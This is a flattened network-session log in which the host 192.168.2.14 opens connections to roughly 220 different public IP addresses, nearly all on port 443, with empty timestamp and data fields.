                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9990192.168.2.1449074147.91.87.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9991192.168.2.144920853.30.168.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9992192.168.2.143416624.60.215.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9993192.168.2.1433496172.2.102.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9994192.168.2.1437192188.92.110.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9995192.168.2.1456870194.28.80.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9996192.168.2.1439422103.197.49.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9997192.168.2.1441912198.133.94.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9998192.168.2.145354439.55.128.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9999192.168.2.144862213.162.86.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10000192.168.2.1455348123.14.228.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10001192.168.2.1451690193.97.236.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10002192.168.2.145605443.94.224.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10003192.168.2.1456830111.202.0.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10004192.168.2.1453852187.102.224.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10005192.168.2.1440584212.12.19.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10006192.168.2.1455194195.240.235.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10007192.168.2.1447594114.72.20.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10008192.168.2.1454772203.138.247.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10009192.168.2.1447588138.205.175.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10010192.168.2.1449402169.160.22.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10011192.168.2.1450378164.116.45.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10012192.168.2.1449748165.251.182.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10013192.168.2.1447926198.246.148.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10014192.168.2.1456676158.74.10.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10015192.168.2.1450986124.45.221.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10016192.168.2.1434022216.91.86.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10017192.168.2.144214085.131.212.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10018192.168.2.1447456208.61.174.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10019192.168.2.1441574147.144.118.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10020192.168.2.1460552194.44.115.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10021192.168.2.1450638213.135.54.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10022192.168.2.1433270177.59.81.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10023192.168.2.1454806189.208.249.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10024192.168.2.144712017.230.248.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10025192.168.2.1446406196.152.39.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10026192.168.2.1439320113.90.79.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10027192.168.2.145326089.84.115.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10028192.168.2.145545217.229.155.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10029192.168.2.1457604167.176.41.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10030192.168.2.1455332159.143.53.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10031192.168.2.145657439.202.108.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10032192.168.2.1449680200.74.172.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10033192.168.2.1434806105.198.65.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10034192.168.2.1452834147.10.207.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10035192.168.2.1452950193.63.78.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10036192.168.2.1449024220.60.83.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10037192.168.2.145234480.43.178.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10038192.168.2.1455424189.221.28.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10039192.168.2.1437040200.49.251.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10040192.168.2.1460596197.246.15.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10041192.168.2.1453198145.154.152.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10042192.168.2.145625087.198.189.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10043192.168.2.1452676138.170.22.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10044192.168.2.144878234.3.83.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10045192.168.2.1443604207.183.152.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10046192.168.2.1437450128.186.190.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10047192.168.2.144361493.74.226.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10048192.168.2.145214094.221.236.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10049192.168.2.145691436.108.93.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10050192.168.2.1432812131.62.187.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10051192.168.2.143618878.21.94.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10052192.168.2.1435614192.243.118.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10053192.168.2.1454226175.0.226.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10054192.168.2.1440422119.233.109.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10055192.168.2.143333017.97.23.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10056192.168.2.14540824.148.239.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10057192.168.2.1433036121.190.234.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10058192.168.2.1456034196.165.123.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10059192.168.2.145136496.63.24.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10060192.168.2.1455866185.183.217.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10061192.168.2.1455682174.198.109.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10062192.168.2.1448000176.91.64.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10063192.168.2.143499451.6.47.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10064192.168.2.1436788213.231.142.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10065192.168.2.146089283.7.81.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10066192.168.2.1441380107.3.186.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10067192.168.2.1459732198.147.52.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10068192.168.2.1455616169.146.225.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10069192.168.2.1439780140.114.236.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10070192.168.2.1440154174.123.134.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10071192.168.2.145226834.196.56.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10072192.168.2.1439308193.19.129.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10073192.168.2.1440702118.138.68.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10074192.168.2.145094449.220.240.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10075192.168.2.1448714143.135.225.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10076192.168.2.1443910192.18.40.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10077192.168.2.1446842129.84.164.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10078192.168.2.145876491.52.81.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10079192.168.2.1446704177.65.255.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10080192.168.2.143579888.247.1.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10081192.168.2.144755292.133.27.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10082192.168.2.1451982153.50.215.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10083192.168.2.145882470.153.150.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10084192.168.2.145583665.114.221.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10085192.168.2.1435956220.231.109.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10086192.168.2.1440946105.109.209.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10087192.168.2.1453928128.162.27.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10088192.168.2.1434054109.36.137.2498080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10089192.168.2.1458104154.69.255.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10090192.168.2.143779468.199.35.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10091192.168.2.144304232.61.110.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10092192.168.2.145977423.104.138.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10093192.168.2.1453392219.84.1.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10094192.168.2.1436934151.66.147.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10095192.168.2.144369443.222.96.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10096192.168.2.1440576193.198.75.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10097192.168.2.1450732200.22.83.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10098192.168.2.1455952141.179.57.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10099192.168.2.143967094.49.206.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10100192.168.2.145229875.86.19.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10101192.168.2.144409632.67.116.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10102192.168.2.144684246.27.247.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10103192.168.2.1444458116.204.9.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10104192.168.2.144307644.156.159.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10105192.168.2.144119685.153.25.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10106192.168.2.1449126154.231.72.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10107192.168.2.1448496123.159.129.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10108192.168.2.1453620155.134.230.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10109192.168.2.1434266121.172.197.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10110192.168.2.1442506166.103.133.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10111192.168.2.1456840158.190.216.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10112192.168.2.1453222190.94.222.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10113192.168.2.144183095.104.43.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10114192.168.2.145845432.145.26.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10115192.168.2.1454358189.195.41.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10116192.168.2.144765287.120.125.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10117192.168.2.1456910145.2.169.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10118192.168.2.143832880.113.77.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10119192.168.2.1433916106.180.112.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10120192.168.2.1456918221.144.141.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10121192.168.2.143988075.153.107.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10122192.168.2.1459784144.57.55.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10123192.168.2.1456804219.76.91.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10124192.168.2.1444438174.95.151.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10125192.168.2.143428082.146.0.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10126192.168.2.1445250175.177.118.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10127192.168.2.1460998197.144.251.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10128192.168.2.145568091.63.12.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10129192.168.2.1452858213.171.127.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10130192.168.2.1437426184.35.242.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10131192.168.2.1453068153.90.38.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10132192.168.2.1455424212.90.184.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10133192.168.2.143568249.5.70.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10134192.168.2.1435250131.30.254.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10135192.168.2.145013457.34.93.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10136192.168.2.1438600163.7.234.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10137192.168.2.145119886.4.142.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10138192.168.2.146048258.241.131.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10139192.168.2.1435644184.100.208.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10140192.168.2.1446844165.121.186.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10141192.168.2.143623036.171.137.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10142192.168.2.1456792186.239.33.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10143192.168.2.145815672.78.10.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10144192.168.2.145001853.23.84.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10145192.168.2.1435356115.5.150.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10146192.168.2.1458514136.48.173.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10147192.168.2.144699280.52.138.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10148192.168.2.14387928.165.59.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10149192.168.2.145499035.68.192.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10150192.168.2.1434984216.237.239.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10151192.168.2.1441590213.81.230.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10152192.168.2.14411281.111.143.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10153192.168.2.1444514193.90.107.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10154192.168.2.145284219.231.4.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10155192.168.2.1446888174.131.226.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10156192.168.2.1457632126.170.12.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10157192.168.2.1451654218.30.128.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10158192.168.2.146013085.59.95.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10159192.168.2.143816657.81.200.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10160192.168.2.1456272131.79.80.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10161192.168.2.144944081.123.168.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10162192.168.2.145419650.46.237.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10163192.168.2.1437406221.78.234.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10164192.168.2.1447322120.224.154.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10165192.168.2.145991060.201.13.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10166192.168.2.1452176153.90.155.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10167192.168.2.145351476.168.67.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10168192.168.2.1439268172.184.157.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10169192.168.2.143411637.161.205.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10170192.168.2.1458378204.102.19.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10171192.168.2.144467459.217.73.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10172192.168.2.1450478128.199.46.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10173192.168.2.1442080120.140.186.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10174192.168.2.144812092.9.233.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10175192.168.2.145726498.128.183.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10176192.168.2.1457398134.176.1.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10177192.168.2.1445838103.63.42.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10178192.168.2.1458836156.14.33.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10179192.168.2.145629014.134.235.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10180192.168.2.145843845.239.31.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10181192.168.2.144517224.228.183.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10182192.168.2.1443956209.250.102.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10183192.168.2.145936872.166.150.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10184192.168.2.1450102187.43.221.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10185192.168.2.1456346138.70.111.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10186192.168.2.1446174202.168.109.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10187192.168.2.1449886196.91.137.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10188192.168.2.1444304123.109.222.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10189192.168.2.1453002100.193.231.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10190192.168.2.143931636.202.225.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10191192.168.2.1445654167.206.16.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10192192.168.2.1458436100.154.20.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10193192.168.2.144647088.86.120.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10194192.168.2.1438280180.156.98.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10195192.168.2.144264080.197.9.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10196192.168.2.1440954185.207.234.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10197192.168.2.1436548173.58.247.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10198192.168.2.145338425.73.76.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10199192.168.2.1442978108.213.186.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10200192.168.2.145061895.118.170.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10201192.168.2.1436388148.69.150.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10202192.168.2.1447548130.230.248.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10203192.168.2.144643844.106.181.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10204192.168.2.144054287.31.219.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10205192.168.2.1455582143.211.32.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10206192.168.2.1435312105.26.171.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10207192.168.2.144690664.81.235.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10208192.168.2.144696446.102.217.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10209192.168.2.145420212.168.113.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10210192.168.2.1449270105.218.211.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10211192.168.2.1444850102.17.252.25443
